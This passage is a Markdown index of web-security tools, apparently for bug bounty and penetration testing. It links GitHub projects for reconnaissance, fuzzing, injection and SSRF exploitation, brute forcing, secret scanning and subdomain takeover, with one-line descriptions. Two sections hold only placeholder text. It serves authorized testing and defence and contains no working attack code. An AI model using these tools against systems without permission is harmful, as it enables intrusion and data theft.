- [WitnessMe](https://github.com/byt3bl33d3r/WitnessMe) - Web Inventory tool, takes screenshots of webpages using Pyppeteer (headless Chrome/Chromium) and provides some extra bells & whistles to make life easier.
- [eyeballer](https://github.com/BishopFox/eyeballer) - Convolutional neural network for analyzing pentest screenshots
- [scrying](https://github.com/nccgroup/scrying) - A tool for collecting RDP, web and VNC screenshots all in one place
- [Depix](https://github.com/beurtschipper/Depix) - Recovers passwords from pixelized screenshots
- [httpscreenshot](https://github.com/breenmachine/httpscreenshot/) - HTTPScreenshot is a tool for grabbing screenshots and HTML of large numbers of websites.
### Technologies
- [wappalyzer](https://github.com/AliasIO/wappalyzer) - Identify technology on websites.
- [webanalyze](https://github.com/rverton/webanalyze) - Port of Wappalyzer (uncovers technologies used on websites) to automate mass scanning.
- [python-builtwith](https://github.com/claymation/python-builtwith) - BuiltWith API client
- [whatweb](https://github.com/urbanadventurer/whatweb) - Next generation web scanner
- [retire.js](https://github.com/RetireJS/retire.js) - scanner detecting the use of JavaScript libraries with known vulnerabilities
- [httpx](https://github.com/projectdiscovery/httpx) - httpx is a fast and multi-purpose HTTP toolkit allows to run multiple probers using retryablehttp library, it is designed to maintain the result reliability with increased threads.
- [fingerprintx](https://github.com/praetorian-inc/fingerprintx) - fingerprintx is a standalone utility for service discovery on open ports that works well with other popular bug bounty command line tools.
### Content Discovery
- [gobuster](https://github.com/OJ/gobuster) - Directory/File, DNS and VHost busting tool written in Go
- [recursebuster](https://github.com/C-Sto/recursebuster) - rapid content discovery tool for recursively querying webservers, handy in pentesting and web application assessments
- [feroxbuster](https://github.com/epi052/feroxbuster) - A fast, simple, recursive content discovery tool written in Rust.
- [dirsearch](https://github.com/maurosoria/dirsearch) - Web path scanner
- [dirsearch](https://github.com/evilsocket/dirsearch) - A Go implementation of dirsearch.
- [filebuster](https://github.com/henshin/filebuster) - An extremely fast and flexible web fuzzer
- [dirstalk](https://github.com/stefanoj3/dirstalk) - Modern alternative to dirbuster/dirb
- [dirbuster-ng](https://github.com/digination/dirbuster-ng) - dirbuster-ng is C CLI implementation of the Java dirbuster tool
- [gospider](https://github.com/jaeles-project/gospider) - Gospider - Fast web spider written in Go
- [hakrawler](https://github.com/hakluke/hakrawler) - Simple, fast web crawler designed for easy, quick discovery of endpoints and assets within a web application
- [crawley](https://github.com/s0rg/crawley) - fast, feature-rich unix-way web scraper/crawler written in Golang.
### Links
- [LinkFinder](https://github.com/GerbenJavado/LinkFinder) - A python script that finds endpoints in JavaScript files
- [JS-Scan](https://github.com/zseano/JS-Scan) - a .js scanner, built in php. designed to scrape urls and other info
- [LinksDumper](https://github.com/arbazkiraak/LinksDumper) - Extract (links/possible endpoints) from responses & filter them via decoding/sorting
- [GoLinkFinder](https://github.com/0xsha/GoLinkFinder) - A fast and minimal JS endpoint extractor
- [BurpJSLinkFinder](https://github.com/InitRoot/BurpJSLinkFinder) - Burp Extension for a passive scanning JS files for endpoint links.
- [urlgrab](https://github.com/IAmStoxe/urlgrab) - A golang utility to spider through a website searching for additional links.
- [waybackurls](https://github.com/tomnomnom/waybackurls) - Fetch all the URLs that the Wayback Machine knows about for a domain
- [gau](https://github.com/lc/gau) - Fetch known URLs from AlienVault's Open Threat Exchange, the Wayback Machine, and Common Crawl.
- [getJS](https://github.com/003random/getJS) - A tool to fastly get all javascript sources/files
- [linx](https://github.com/riza/linx) - Reveals invisible links within JavaScript files
### Parameters
- [parameth](https://github.com/maK-/parameth) - This tool can be used to brute discover GET and POST parameters
- [param-miner](https://github.com/PortSwigger/param-miner) - This extension identifies hidden, unlinked parameters. It's particularly useful for finding web cache poisoning vulnerabilities.
- [ParamPamPam](https://github.com/Bo0oM/ParamPamPam) - This tool for brute discover GET and POST parameters.
- [Arjun](https://github.com/s0md3v/Arjun) - HTTP parameter discovery suite.
- [ParamSpider](https://github.com/devanshbatham/ParamSpider) - Mining parameters from dark corners of Web Archives.
- [x8](https://github.com/Sh1Yo/x8) - Hidden parameters discovery suite written in Rust.
### Fuzzing
- [wfuzz](https://github.com/xmendez/wfuzz) - Web application fuzzer
- [ffuf](https://github.com/ffuf/ffuf) - Fast web fuzzer written in Go
- [fuzzdb](https://github.com/fuzzdb-project/fuzzdb) - Dictionary of attack patterns and primitives for black-box application fault injection and resource discovery.
- [IntruderPayloads](https://github.com/1N3/IntruderPayloads) - A collection of Burpsuite Intruder payloads, BurpBounty payloads, fuzz lists, malicious file uploads and web pentesting methodologies and checklists.
- [fuzz.txt](https://github.com/Bo0oM/fuzz.txt) - Potentially dangerous files
- [fuzzilli](https://github.com/googleprojectzero/fuzzilli) - A JavaScript Engine Fuzzer
- [fuzzapi](https://github.com/Fuzzapi/fuzzapi) - Fuzzapi is a tool used for REST API pentesting and uses API_Fuzzer gem
- [qsfuzz](https://github.com/ameenmaali/qsfuzz) - qsfuzz (Query String Fuzz) allows you to build your own rules to fuzz query strings and easily identify vulnerabilities.
- [vaf](https://github.com/d4rckh/vaf) - very advanced (web) fuzzer written in Nim.
---
## Exploitation
Lorem ipsum dolor sit amet
### Command Injection
- [commix](https://github.com/commixproject/commix) - Automated All-in-One OS command injection and exploitation tool.
### CORS Misconfiguration
- [Corsy](https://github.com/s0md3v/Corsy) - CORS Misconfiguration Scanner
- [CORStest](https://github.com/RUB-NDS/CORStest) - A simple CORS misconfiguration scanner
- [cors-scanner](https://github.com/laconicwolf/cors-scanner) - A multi-threaded scanner that helps identify CORS flaws/misconfigurations
- [CorsMe](https://github.com/Shivangx01b/CorsMe) - Cross Origin Resource Sharing MisConfiguration Scanner
### CRLF Injection
- [CRLFsuite](https://github.com/Nefcore/CRLFsuite) - A fast tool specially designed to scan CRLF injection
- [crlfuzz](https://github.com/dwisiswant0/crlfuzz) - A fast tool to scan CRLF vulnerability written in Go
- [CRLF-Injection-Scanner](https://github.com/MichaelStott/CRLF-Injection-Scanner) - Command line tool for testing CRLF injection on a list of domains.
- [Injectus](https://github.com/BountyStrike/Injectus) - CRLF and open redirect fuzzer
### CSRF Injection
- [XSRFProbe](https://github.com/0xInfection/XSRFProbe) -The Prime Cross Site Request Forgery (CSRF) Audit and Exploitation Toolkit.
### Directory Traversal
- [dotdotpwn](https://github.com/wireghoul/dotdotpwn) - DotDotPwn - The Directory Traversal Fuzzer
- [FDsploit](https://github.com/chrispetrou/FDsploit) - File Inclusion & Directory Traversal fuzzing, enumeration & exploitation tool.
- [off-by-slash](https://github.com/bayotop/off-by-slash) - Burp extension to detect alias traversal via NGINX misconfiguration at scale.
- [liffier](https://github.com/momenbasel/liffier) - tired of manually add dot-dot-slash to your possible path traversal? this short snippet will increment ../ on the URL.
### File Inclusion
- [liffy](https://github.com/mzfr/liffy) - Local file inclusion exploitation tool
- [Burp-LFI-tests](https://github.com/Team-Firebugs/Burp-LFI-tests) - Fuzzing for LFI using Burpsuite
- [LFI-Enum](https://github.com/mthbernardes/LFI-Enum) - Scripts to execute enumeration via LFI
- [LFISuite](https://github.com/D35m0nd142/LFISuite) - Totally Automatic LFI Exploiter (+ Reverse Shell) and Scanner
- [LFI-files](https://github.com/hussein98d/LFI-files) - Wordlist to bruteforce for LFI
### GraphQL Injection
- [inql](https://github.com/doyensec/inql) - InQL - A Burp Extension for GraphQL Security Testing
- [GraphQLmap](https://github.com/swisskyrepo/GraphQLmap) - GraphQLmap is a scripting engine to interact with a graphql endpoint for pentesting purposes.
- [shapeshifter](https://github.com/szski/shapeshifter) - GraphQL security testing tool
- [graphql_beautifier](https://github.com/zidekmat/graphql_beautifier) - Burp Suite extension to help make Graphql request more readable
- [clairvoyance](https://github.com/nikitastupin/clairvoyance) - Obtain GraphQL API schema despite disabled introspection!
### Header Injection
- [headi](https://github.com/mlcsec/headi) - Customisable and automated HTTP header injection.
### Insecure Deserialization
- [ysoserial](https://github.com/frohoff/ysoserial) - A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization.
- [GadgetProbe](https://github.com/BishopFox/GadgetProbe) - Probe endpoints consuming Java serialized objects to identify classes, libraries, and library versions on remote Java classpaths.
- [ysoserial.net](https://github.com/pwntester/ysoserial.net) - Deserialization payload generator for a variety of .NET formatters
- [phpggc](https://github.com/ambionics/phpggc) - PHPGGC is a library of PHP unserialize() payloads along with a tool to generate them, from command line or programmatically.
### Insecure Direct Object References
- [Autorize](https://github.com/Quitten/Autorize) - Automatic authorization enforcement detection extension for burp suite written in Jython developed by Barak Tawily
### Open Redirect
- [Oralyzer](https://github.com/r0075h3ll/Oralyzer) - Open Redirection Analyzer
- [Injectus](https://github.com/BountyStrike/Injectus) - CRLF and open redirect fuzzer
- [dom-red](https://github.com/Naategh/dom-red) - Small script to check a list of domains against open redirect vulnerability
- [OpenRedireX](https://github.com/devanshbatham/OpenRedireX) - A Fuzzer for OpenRedirect issues
### Race Condition
- [razzer](https://github.com/compsec-snu/razzer) - A Kernel fuzzer focusing on race bugs
- [racepwn](https://github.com/racepwn/racepwn) - Race Condition framework
- [requests-racer](https://github.com/nccgroup/requests-racer) - Small Python library that makes it easy to exploit race conditions in web apps with Requests.
- [turbo-intruder](https://github.com/PortSwigger/turbo-intruder) - Turbo Intruder is a Burp Suite extension for sending large numbers of HTTP requests and analyzing the results.
- [race-the-web](https://github.com/TheHackerDev/race-the-web) - Tests for race conditions in web applications. Includes a RESTful API to integrate into a continuous integration pipeline.
### Request Smuggling
- [http-request-smuggling](https://github.com/anshumanpattnaik/http-request-smuggling) - HTTP Request Smuggling Detection Tool
- [smuggler](https://github.com/defparam/smuggler) - Smuggler - An HTTP Request Smuggling / Desync testing tool written in Python 3
- [h2csmuggler](https://github.com/BishopFox/h2csmuggler) - HTTP Request Smuggling over HTTP/2 Cleartext (h2c)
- [tiscripts](https://github.com/defparam/tiscripts) - These scripts I use to create Request Smuggling Desync payloads for CLTE and TECL style attacks.
### Server Side Request Forgery
- [SSRFmap](https://github.com/swisskyrepo/SSRFmap) - Automatic SSRF fuzzer and exploitation tool
- [Gopherus](https://github.com/tarunkant/Gopherus) - This tool generates gopher link for exploiting SSRF and gaining RCE in various servers
- [ground-control](https://github.com/jobertabma/ground-control) - A collection of scripts that run on my web server. Mainly for debugging SSRF, blind XSS, and XXE vulnerabilities.
- [SSRFire](https://github.com/micha3lb3n/SSRFire) - An automated SSRF finder. Just give the domain name and your server and chill! ;) Also has options to find XSS and open redirects
- [httprebind](https://github.com/daeken/httprebind) - Automatic tool for DNS rebinding-based SSRF attacks
- [ssrf-sheriff](https://github.com/teknogeek/ssrf-sheriff) - A simple SSRF-testing sheriff written in Go
- [B-XSSRF](https://github.com/SpiderMate/B-XSSRF) - Toolkit to detect and keep track on Blind XSS, XXE & SSRF
- [extended-ssrf-search](https://github.com/Damian89/extended-ssrf-search) - Smart ssrf scanner using different methods like parameter brute forcing in post and get...
- [gaussrf](https://github.com/KathanP19/gaussrf) - Fetch known URLs from AlienVault's Open Threat Exchange, the Wayback Machine, and Common Crawl and Filter Urls With OpenRedirection or SSRF Parameters.
- [ssrfDetector](https://github.com/JacobReynolds/ssrfDetector) - Server-side request forgery detector
- [grafana-ssrf](https://github.com/RandomRobbieBF/grafana-ssrf) - Authenticated SSRF in Grafana
- [sentrySSRF](https://github.com/xawdxawdx/sentrySSRF) - Tool to searching sentry config on page or in javascript files and check blind SSRF
- [lorsrf](https://github.com/knassar702/lorsrf) - Bruteforcing on Hidden parameters to find SSRF vulnerability using GET and POST Methods
- [singularity](https://github.com/nccgroup/singularity) - A DNS rebinding attack framework.
- [whonow](https://github.com/brannondorsey/whonow) - A "malicious" DNS server for executing DNS Rebinding attacks on the fly (public instance running on rebind.network:53)
- [dns-rebind-toolkit](https://github.com/brannondorsey/dns-rebind-toolkit) - A front-end JavaScript toolkit for creating DNS rebinding attacks.
- [dref](https://github.com/FSecureLABS/dref) - DNS Rebinding Exploitation Framework
- [rbndr](https://github.com/taviso/rbndr) - Simple DNS Rebinding Service
- [httprebind](https://github.com/daeken/httprebind) - Automatic tool for DNS rebinding-based SSRF attacks
- [dnsFookup](https://github.com/makuga01/dnsFookup) - DNS rebinding toolkit
### SQL Injection
- [sqlmap](https://github.com/sqlmapproject/sqlmap) - Automatic SQL injection and database takeover tool
- [NoSQLMap](https://github.com/codingo/NoSQLMap) - Automated NoSQL database enumeration and web application exploitation tool.
- [SQLiScanner](https://github.com/0xbug/SQLiScanner) - Automatic SQL injection with Charles and sqlmap api
- [SleuthQL](https://github.com/RhinoSecurityLabs/SleuthQL) - Python3 Burp History parsing tool to discover potential SQL injection points. To be used in tandem with SQLmap.
- [mssqlproxy](https://github.com/blackarrowsec/mssqlproxy) - mssqlproxy is a toolkit aimed to perform lateral movement in restricted environments through a compromised Microsoft SQL Server via socket reuse
- [sqli-hunter](https://github.com/zt2/sqli-hunter) - SQLi-Hunter is a simple HTTP / HTTPS proxy server and a SQLMAP API wrapper that makes digging SQLi easy.
- [waybackSqliScanner](https://github.com/ghostlulzhacks/waybackSqliScanner) - Gather urls from wayback machine then test each GET parameter for sql injection.
- [ESC](https://github.com/NetSPI/ESC) - Evil SQL Client (ESC) is an interactive .NET SQL console client with enhanced SQL Server discovery, access, and data exfiltration features.
- [mssqli-duet](https://github.com/Keramas/mssqli-duet) - SQL injection script for MSSQL that extracts domain users from an Active Directory environment based on RID bruteforcing
- [burp-to-sqlmap](https://github.com/Miladkhoshdel/burp-to-sqlmap) - Performing SQLInjection test on Burp Suite Bulk Requests using SQLMap
- [BurpSQLTruncSanner](https://github.com/InitRoot/BurpSQLTruncSanner) - Messy BurpSuite plugin for SQL Truncation vulnerabilities.
- [andor](https://github.com/sadicann/andor) - Blind SQL Injection Tool with Golang
- [Blinder](https://github.com/mhaskar/Blinder) - A python library to automate time-based blind SQL injection
- [sqliv](https://github.com/the-robot/sqliv) - massive SQL injection vulnerability scanner
- [nosqli](https://github.com/Charlie-belmer/nosqli) - NoSql Injection CLI tool, for finding vulnerable websites using MongoDB.
### XSS Injection
- [XSStrike](https://github.com/s0md3v/XSStrike) - Most advanced XSS scanner.
- [xssor2](https://github.com/evilcos/xssor2) - XSS'OR - Hack with JavaScript.
- [xsscrapy](https://github.com/DanMcInerney/xsscrapy) - XSS spider - 66/66 wavsep XSS detected
- [sleepy-puppy](https://github.com/Netflix-Skunkworks/sleepy-puppy) - Sleepy Puppy XSS Payload Management Framework
- [ezXSS](https://github.com/ssl/ezXSS) - ezXSS is an easy way for penetration testers and bug bounty hunters to test (blind) Cross Site Scripting.
- [xsshunter](https://github.com/mandatoryprogrammer/xsshunter) - The XSS Hunter service - a portable version of XSSHunter.com
- [dalfox](https://github.com/hahwul/dalfox) - DalFox(Finder Of XSS) / Parameter Analysis and XSS Scanning tool based on golang
- [xsser](https://github.com/epsylon/xsser) - Cross Site "Scripter" (aka XSSer) is an automatic -framework- to detect, exploit and report XSS vulnerabilities in web-based applications.
- [XSpear](https://github.com/hahwul/XSpear) - Powerfull XSS Scanning and Parameter analysis tool&gem
- [weaponised-XSS-payloads](https://github.com/hakluke/weaponised-XSS-payloads) - XSS payloads designed to turn alert(1) into P1
- [tracy](https://github.com/nccgroup/tracy) - A tool designed to assist with finding all sinks and sources of a web application and display these results in a digestible manner.
- [ground-control](https://github.com/jobertabma/ground-control) - A collection of scripts that run on my web server. Mainly for debugging SSRF, blind XSS, and XXE vulnerabilities.
- [xssValidator](https://github.com/nVisium/xssValidator) - This is a burp intruder extender that is designed for automation and validation of XSS vulnerabilities.
- [JSShell](https://github.com/Den1al/JSShell) - An interactive multi-user web JS shell
- [bXSS](https://github.com/LewisArdern/bXSS) - bXSS is a utility which can be used by bug hunters and organizations to identify Blind Cross-Site Scripting.
- [docem](https://github.com/whitel1st/docem) - Uility to embed XXE and XSS payloads in docx,odt,pptx,etc (OXML_XEE on steroids)
- [XSS-Radar](https://github.com/bugbountyforum/XSS-Radar) - XSS Radar is a tool that detects parameters and fuzzes them for cross-site scripting vulnerabilities.
- [BruteXSS](https://github.com/rajeshmajumdar/BruteXSS) - BruteXSS is a tool written in python simply to find XSS vulnerabilities in web application.
- [findom-xss](https://github.com/dwisiswant0/findom-xss) - A fast DOM based XSS vulnerability scanner with simplicity.
- [domdig](https://github.com/fcavallarin/domdig) - DOM XSS scanner for Single Page Applications
- [femida](https://github.com/wish-i-was/femida) - Automated blind-xss search for Burp Suite
- [B-XSSRF](https://github.com/SpiderMate/B-XSSRF) - Toolkit to detect and keep track on Blind XSS, XXE & SSRF
- [domxssscanner](https://github.com/yaph/domxssscanner) - DOMXSS Scanner is an online tool to scan source code for DOM based XSS vulnerabilities
- [xsshunter_client](https://github.com/mandatoryprogrammer/xsshunter_client) - Correlated injection proxy tool for XSS Hunter
- [extended-xss-search](https://github.com/Damian89/extended-xss-search) - A better version of my xssfinder tool - scans for different types of xss on a list of urls.
- [xssmap](https://github.com/Jewel591/xssmap) - XSSMap 是一款基于 Python3 开发用于检测 XSS 漏洞的工具
- [XSSCon](https://github.com/menkrep1337/XSSCon) - XSSCon: Simple XSS Scanner tool
- [BitBlinder](https://github.com/BitTheByte/BitBlinder) - BurpSuite extension to inject custom cross-site scripting payloads on every form/request submitted to detect blind XSS vulnerabilities
- [XSSOauthPersistence](https://github.com/dxa4481/XSSOauthPersistence) - Maintaining account persistence via XSS and Oauth
- [shadow-workers](https://github.com/shadow-workers/shadow-workers) - Shadow Workers is a free and open source C2 and proxy designed for penetration testers to help in the exploitation of XSS and malicious Service Workers (SW)
- [rexsser](https://github.com/profmoriarity/rexsser) - This is a burp plugin that extracts keywords from response using regexes and test for reflected XSS on the target scope.
- [xss-flare](https://github.com/EgeBalci/xss-flare) - XSS hunter on cloudflare serverless workers.
- [Xss-Sql-Fuzz](https://github.com/jiangsir404/Xss-Sql-Fuzz) - burpsuite 插件对GP所有参数(过滤特殊参数)一键自动添加xss sql payload 进行fuzz
- [vaya-ciego-nen](https://github.com/hipotermia/vaya-ciego-nen) - Detect, manage and exploit Blind Cross-site scripting (XSS) vulnerabilities.
- [dom-based-xss-finder](https://github.com/AsaiKen/dom-based-xss-finder) - Chrome extension that finds DOM based XSS vulnerabilities
- [XSSTerminal](https://github.com/machinexa2/XSSTerminal) - Develop your own XSS Payload using interactive typing
- [xss2png](https://github.com/vavkamil/xss2png) - PNG IDAT chunks XSS payload generator
- [XSSwagger](https://github.com/vavkamil/XSSwagger) - A simple Swagger-ui scanner that can detect old versions vulnerable to various XSS attacks
### XXE Injection
- [ground-control](https://github.com/jobertabma/ground-control) - A collection of scripts that run on my web server. Mainly for debugging SSRF, blind XSS, and XXE vulnerabilities.
- [dtd-finder](https://github.com/GoSecure/dtd-finder) - List DTDs and generate XXE payloads using those local DTDs.
- [docem](https://github.com/whitel1st/docem) - Uility to embed XXE and XSS payloads in docx,odt,pptx,etc (OXML_XEE on steroids)
- [xxeserv](https://github.com/staaldraad/xxeserv) - A mini webserver with FTP support for XXE payloads
- [xxexploiter](https://github.com/luisfontes19/xxexploiter) - Tool to help exploit XXE vulnerabilities
- [B-XSSRF](https://github.com/SpiderMate/B-XSSRF) - Toolkit to detect and keep track on Blind XSS, XXE & SSRF
- [XXEinjector](https://github.com/enjoiz/XXEinjector) - Tool for automatic exploitation of XXE vulnerability using direct and different out of band methods.
- [oxml_xxe](https://github.com/BuffaloWill/oxml_xxe) - A tool for embedding XXE/XML exploits into different filetypes
- [metahttp](https://github.com/vp777/metahttp) - A bash script that automates the scanning of a target network for HTTP resources through XXE
---
## Miscellaneous
Lorem ipsum dolor sit amet
### Passwords
- [thc-hydra](https://github.com/vanhauser-thc/thc-hydra) - Hydra is a parallelized login cracker which supports numerous protocols to attack.
- [DefaultCreds-cheat-sheet](https://github.com/ihebski/DefaultCreds-cheat-sheet) - One place for all the default credentials to assist the Blue/Red teamers activities on finding devices with default password
- [changeme](https://github.com/ztgrace/changeme) - A default credential scanner.
- [BruteX](https://github.com/1N3/BruteX) - Automatically brute force all services running on a target.
- [patator](https://github.com/lanjelot/patator) - Patator is a multi-purpose brute-forcer, with a modular design and a flexible usage.
### Secrets
- [git-secrets](https://github.com/awslabs/git-secrets) - Prevents you from committing secrets and credentials into git repositories
- [gitleaks](https://github.com/zricethezav/gitleaks) - Scan git repos (or files) for secrets using regex and entropy
- [truffleHog](https://github.com/dxa4481/truffleHog) - Searches through git repositories for high entropy strings and secrets, digging deep into commit history
- [gitGraber](https://github.com/hisxo/gitGraber) - gitGraber: monitor GitHub to search and find sensitive data in real time for different online services
- [talisman](https://github.com/thoughtworks/talisman) - By hooking into the pre-push hook provided by Git, Talisman validates the outgoing changeset for things that look suspicious - such as authorization tokens and private keys.
- [GitGot](https://github.com/BishopFox/GitGot) - Semi-automated, feedback-driven tool to rapidly search through troves of public data on GitHub for sensitive secrets.
- [git-all-secrets](https://github.com/anshumanbh/git-all-secrets) - A tool to capture all the git secrets by leveraging multiple open source git searching tools
- [github-search](https://github.com/gwen001/github-search) - Tools to perform basic search on GitHub.
- [git-vuln-finder](https://github.com/cve-search/git-vuln-finder) - Finding potential software vulnerabilities from git commit messages
- [commit-stream](https://github.com/x1sec/commit-stream) - #OSINT tool for finding Github repositories by extracting commit logs in real time from the Github event API
- [gitrob](https://github.com/michenriksen/gitrob) - Reconnaissance tool for GitHub organizations
- [repo-supervisor](https://github.com/auth0/repo-supervisor) - Scan your code for security misconfiguration, search for passwords and secrets.
- [GitMiner](https://github.com/UnkL4b/GitMiner) - Tool for advanced mining for content on Github
- [shhgit](https://github.com/eth0izzle/shhgit) - Ah shhgit! Find GitHub secrets in real time
- [detect-secrets](https://github.com/Yelp/detect-secrets) - An enterprise friendly way of detecting and preventing secrets in code.
- [rusty-hog](https://github.com/newrelic/rusty-hog) - A suite of secret scanners built in Rust for performance. Based on TruffleHog
- [whispers](https://github.com/Skyscanner/whispers) - Identify hardcoded secrets and dangerous behaviours
- [yar](https://github.com/nielsing/yar) - Yar is a tool for plunderin' organizations, users and/or repositories.
- [dufflebag](https://github.com/BishopFox/dufflebag) - Search exposed EBS volumes for secrets
- [secret-bridge](https://github.com/duo-labs/secret-bridge) - Monitors Github for leaked secrets
- [earlybird](https://github.com/americanexpress/earlybird) - EarlyBird is a sensitive data detection tool capable of scanning source code repositories for clear text password violations, PII, outdated cryptography methods, key files and more.
- [Trufflehog-Chrome-Extension](https://github.com/trufflesecurity/Trufflehog-Chrome-Extension) - Trufflehog-Chrome-Extension
- [noseyparker](https://github.com/praetorian-inc/noseyparker) - Nosey Parker is a command-line program that finds secrets and sensitive information in textual data and Git history.
### Git
- [GitTools](https://github.com/internetwache/GitTools) - A repository with 3 tools for pwn'ing websites with .git repositories available
- [gitjacker](https://github.com/liamg/gitjacker) - Leak git repositories from misconfigured websites
- [git-dumper](https://github.com/arthaud/git-dumper) - A tool to dump a git repository from a website
- [GitHunter](https://github.com/digininja/GitHunter) - A tool for searching a Git repository for interesting content
- [dvcs-ripper](https://github.com/kost/dvcs-ripper) - Rip web accessible (distributed) version control systems: SVN/GIT/HG...
- [Gato (Github Attack TOolkit)](https://github.com/praetorian-inc/gato) - GitHub Self-Hosted Runner Enumeration and Attack Tool
### Buckets
- [S3Scanner](https://github.com/sa7mon/S3Scanner) - Scan for open AWS S3 buckets and dump the contents
- [AWSBucketDump](https://github.com/jordanpotti/AWSBucketDump) - Security Tool to Look For Interesting Files in S3 Buckets
- [CloudScraper](https://github.com/jordanpotti/CloudScraper) - CloudScraper: Tool to enumerate targets in search of cloud resources. S3 Buckets, Azure Blobs, Digital Ocean Storage Space.
- [s3viewer](https://github.com/SharonBrizinov/s3viewer) - Publicly Open Amazon AWS S3 Bucket Viewer
- [festin](https://github.com/cr0hn/festin) - FestIn - S3 Bucket Weakness Discovery
- [s3reverse](https://github.com/hahwul/s3reverse) - The format of various s3 buckets is convert in one format. for bugbounty and security testing.
- [mass-s3-bucket-tester](https://github.com/random-robbie/mass-s3-bucket-tester) - This tests a list of s3 buckets to see if they have dir listings enabled or if they are uploadable
- [S3BucketList](https://github.com/AlecBlance/S3BucketList) - Firefox plugin that lists Amazon S3 Buckets found in requests
- [dirlstr](https://github.com/cybercdh/dirlstr) - Finds Directory Listings or open S3 buckets from a list of URLs
- [Burp-AnonymousCloud](https://github.com/codewatchorg/Burp-AnonymousCloud) - Burp extension that performs a passive scan to identify cloud buckets and then test them for publicly accessible vulnerabilities
- [kicks3](https://github.com/abuvanth/kicks3) - S3 bucket finder from html,js and bucket misconfiguration testing tool
- [2tearsinabucket](https://github.com/Revenant40/2tearsinabucket) - Enumerate s3 buckets for a specific target.
- [s3_objects_check](https://github.com/nccgroup/s3_objects_check) - Whitebox evaluation of effective S3 object permissions, to identify publicly accessible files.
- [s3tk](https://github.com/ankane/s3tk) - A security toolkit for Amazon S3
- [CloudBrute](https://github.com/0xsha/CloudBrute) - Awesome cloud enumerator
- [s3cario](https://github.com/0xspade/s3cario) - This tool will get the CNAME first if it's a valid Amazon s3 bucket and if it's not, it will try to check if the domain is a bucket name.
- [S3Cruze](https://github.com/JR0ch17/S3Cruze) - All-in-one AWS S3 bucket tool for pentesters.
### CMS
- [wpscan](https://github.com/wpscanteam/wpscan) - WPScan is a free, for non-commercial use, black box WordPress security scanner
- [WPSpider](https://github.com/cyc10n3/WPSpider) - A centralized dashboard for running and scheduling WordPress scans powered by wpscan utility.
- [wprecon](https://github.com/blackcrw/wprecon) - Wordpress Recon
- [CMSmap](https://github.com/Dionach/CMSmap) - CMSmap is a python open source CMS scanner that automates the process of detecting security flaws of the most popular CMSs.
- [joomscan](https://github.com/OWASP/joomscan) - OWASP Joomla Vulnerability Scanner Project
- [pyfiscan](https://github.com/fgeek/pyfiscan) - Free web-application vulnerability and version scanner
### JSON Web Token
- [jwt_tool](https://github.com/ticarpi/jwt_tool) - A toolkit for testing, tweaking and cracking JSON Web Tokens
- [c-jwt-cracker](https://github.com/brendan-rius/c-jwt-cracker) - JWT brute force cracker written in C
- [jwt-heartbreaker](https://github.com/wallarm/jwt-heartbreaker) - The Burp extension to check JWT (JSON Web Tokens) for using keys from known from public sources
- [jwtear](https://github.com/KINGSABRI/jwtear) - Modular command-line tool to parse, create and manipulate JWT tokens for hackers
- [jwt-key-id-injector](https://github.com/dariusztytko/jwt-key-id-injector) - Simple python script to check against hypothetical JWT vulnerability.
- [jwt-hack](https://github.com/hahwul/jwt-hack) - jwt-hack is tool for hacking / security testing to JWT.
- [jwt-cracker](https://github.com/lmammino/jwt-cracker) - Simple HS256 JWT token brute force cracker
### postMessage
- [postMessage-tracker](https://github.com/fransr/postMessage-tracker) - A Chrome Extension to track postMessage usage (url, domain and stack) both by logging using CORS and also visually as an extension-icon
- [PostMessage_Fuzz_Tool](https://github.com/kiranreddyrebel/PostMessage_Fuzz_Tool) - #BugBounty #BugBounty Tools #WebDeveloper Tool
### Subdomain Takeover
- [subjack](https://github.com/haccer/subjack) - Subdomain Takeover tool written in Go
- [SubOver](https://github.com/Ice3man543/SubOver) - A Powerful Subdomain Takeover Tool
- [autoSubTakeover](https://github.com/JordyZomer/autoSubTakeover) - A tool used to check if a CNAME resolves to the scope address. If the CNAME resolves to a non-scope address it might be worth checking out if subdomain takeover is possible.
- [NSBrute](https://github.com/shivsahni/NSBrute) - Python utility to takeover domains vulnerable to AWS NS Takeover
- [can-i-take-over-xyz](https://github.com/EdOverflow/can-i-take-over-xyz) - "Can I take over XYZ?" — a list of services and how to claim (sub)domains with dangling DNS records.
- [cnames](https://github.com/cybercdh/cnames) - take a list of resolved subdomains and output any corresponding CNAMES en masse.
- [subHijack](https://github.com/vavkamil/old-repos-backup/tree/master/subHijack-master) - Hijacking forgotten & misconfigured subdomains
- [tko-subs](https://github.com/anshumanbh/tko-subs) - A tool that can help detect and takeover subdomains with dead DNS records
- [HostileSubBruteforcer](https://github.com/nahamsec/HostileSubBruteforcer) - This app will bruteforce for exisiting subdomains and provide information if the 3rd party host has been properly setup.
- [second-order](https://github.com/mhmdiaa/second-order) - Second-order subdomain takeover scanner
- [takeover](https://github.com/mzfr/takeover) - A tool for testing subdomain takeover possibilities at a mass scale.
- [dnsReaper](https://github.com/punk-security/dnsReaper) - DNS Reaper is yet another sub-domain takeover tool, but with an emphasis on accuracy, speed and the number of signatures in our arsenal!
### Vulnerability Scanners
- [nuclei](https://github.com/projectdiscovery/nuclei) - Nuclei is a fast tool for configurable targeted scanning based on templates offering massive extensibility and ease of use.
- [Sn1per](https://github.com/1N3/Sn1per) - Automated pentest framework for offensive security experts
- [metasploit-framework](https://github.com/rapid7/metasploit-framework) - Metasploit Framework
- [nikto](https://github.com/sullo/nikto) - Nikto web server scanner
- [arachni](https://github.com/Arachni/arachni) - Web Application Security Scanner Framework
- [jaeles](https://github.com/jaeles-project/jaeles) - The Swiss Army knife for automated Web Application Testing
- [retire.js](https://github.com/RetireJS/retire.js) - scanner detecting the use of JavaScript libraries with known vulnerabilities
- [Osmedeus](https://github.com/j3ssie/Osmedeus) - Fully automated offensive security framework for reconnaissance and vulnerability scanning
- [getsploit](https://github.com/vulnersCom/getsploit) - Command line utility for searching and downloading exploits
- [flan](https://github.com/cloudflare/flan) - A pretty sweet vulnerability scanner
- [Findsploit](https://github.com/1N3/Findsploit) - Find exploits in local and online databases instantly
- [BlackWidow](https://github.com/1N3/BlackWidow) - A Python based web application scanner to gather OSINT and fuzz for OWASP vulnerabilities on a target website.
- [backslash-powered-scanner](https://github.com/PortSwigger/backslash-powered-scanner) - Finds unknown classes of injection vulnerabilities
- [Eagle](https://github.com/BitTheByte/Eagle) - Multithreaded Plugin based vulnerability scanner for mass detection of web-based applications vulnerabilities
- [cariddi](https://github.com/edoardottt/cariddi) - Take a list of domains, crawl urls and scan for endpoints, secrets, api keys, file extensions, tokens and more...
